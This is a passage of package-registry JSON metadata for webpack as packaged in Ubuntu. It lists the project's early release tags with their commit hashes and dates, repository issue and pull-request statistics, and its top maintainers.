arsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-22T21:31:24.063Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/node-webpack?arch=source\u0026distro=ubuntu-23.04\u0026repository_url=https://launchpad.net/ubuntu/lunar","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/node-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/node-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/node-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/